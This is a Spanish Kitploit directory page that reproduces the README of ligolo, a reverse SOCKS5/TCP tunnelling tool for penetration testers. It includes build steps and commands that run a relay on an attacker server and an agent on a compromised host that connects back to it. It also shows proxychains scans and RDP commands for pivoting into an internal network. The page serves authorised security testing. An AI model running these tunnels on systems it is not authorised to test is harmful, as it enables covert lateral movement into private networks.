Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ligolo — Túneles inversos simplificados para pentesters, por pentesters https://sysdream.com/ | Kitploit
Herramientas/GitHubGitHub/sysdream/ligolo
Movimiento LateralPruebas de PenetraciónRed Teaming
GitHubsysdream/ligolo

ligolo

Túneles inversos simplificados para pentesters, por pentesters https://sysdream.com/

Ver Repositorio
1.8k227hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Ligolo: Túneles inversos simplificados para pentesters, por pentesters

forthebadge forthebadge

Ligolo

Tabla de contenidos

  • Introducción
  • Caso de uso
  • Demostración rápida
  • Rendimiento
  • Uso
    • Configuración / Compilación
    • ¿Cómo usarlo?
    • En resumen
    • Opciones
  • Características
  • Por hacer
  • Licencias
  • Créditos

Introducción

Ligolo es una herramienta simple y ligera para establecer túneles SOCKS5 o TCP desde una conexión inversa con total seguridad (certificado TLS con curva elíptica).

Es comparable a Meterpreter con Autoroute + Socks4a, pero más estable y rápido.

Caso de uso

Has comprometido un servidor Windows/Linux/Mac durante tu auditoría externa. Este servidor se encuentra dentro de una red LAN y deseas establecer conexiones a otras máquinas en esa red.

Ligolo puede configurar un túnel para acceder a los recursos del servidor interno.

Demostración rápida

Relevo de una conexión RDP usando Proxychains (WAN).

RDP

Rendimiento

Aquí hay una captura de pantalla de una prueba de velocidad entre dos hosts de 100mb/s (ligolo/localrelay). El rendimiento puede variar según la configuración del sistema y la red.

Speedtest

Uso

Configuración / Compilación

Asegúrate de que Go esté instalado y funcionando.

  1. Obtener Ligolo y las dependencias
root@kitploit:~
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. Generar certificados TLS autofirmados (se colocarán en la carpeta certs)
root@kitploit:~
make certs TLS_HOST=example.com

NOTA: También puedes usar tus propios certificados usando la opción de make TLS_CERT al llamar a build. Ejemplo: make build-all TLS_CERT=certs/mycert.pem.

  1. Compilar
  • 3.1. Para todas las arquitecturas
root@kitploit:~
make build-all
  • 3.2. (o) Para la arquitectura actual
root@kitploit:~
make build

¿Cómo usarlo?

Ligolo consta de dos módulos:

  • localrelay
  • ligolo

Localrelay está destinado a ejecutarse en el servidor de control (el servidor atacante).

Ligolo es el programa que se ejecuta en la computadora objetivo.

Para localrelay, puedes dejar las opciones predeterminadas. Escuchará en todas las interfaces en el puerto 5555 y esperará conexiones de ligolo (parámetro -relayserver).

Para ligolo, debes especificar la dirección IP del servidor de relevo (o tu servidor de ataque) usando el parámetro -relayserver ip:port.

Puedes usar la opción -h para obtener ayuda.

Una vez que se haya establecido la conexión entre Ligolo y LocalRelay, se configurará un proxy SOCKS5 en el puerto TCP 1080 en el servidor de relevo (puedes cambiar la dirección/puerto TCP usando la opción -localserver).

Después de eso, solo tienes que usar tu herramienta favorita (Proxychains, por ejemplo) y explorar la red LAN del cliente.

En resumen

En tu servidor de ataque.

root@kitploit:~
./bin/localrelay_linux_amd64

En el host comprometido.

root@kitploit:~
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

Una vez establecida la conexión, configura los siguientes parámetros en el archivo de configuración de ProxyChains (en el servidor de ataque):

root@kitploit:~
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

Benefíciate.

root@kitploit:~
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

Opciones

Opciones de localrelay:

root@kitploit:~
Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Opciones de ligolo:

root@kitploit:~
Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

Características

  • Túnel TLS 1.3 con fijación TLS
  • Multiplataforma (Windows/Linux/Mac/...)
  • Multiplexación (1 conexión TCP para todos los flujos)
  • Proxy SOCKS5 o relevo simple

Por hacer

  • Mejor manejo de tiempos de espera
  • Soporte UDP para SOCKS5
  • Implementar mTLS

Licencias

GNU General Public License v3.0 (Ver LICENSING).

Créditos

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

Descargar herramienta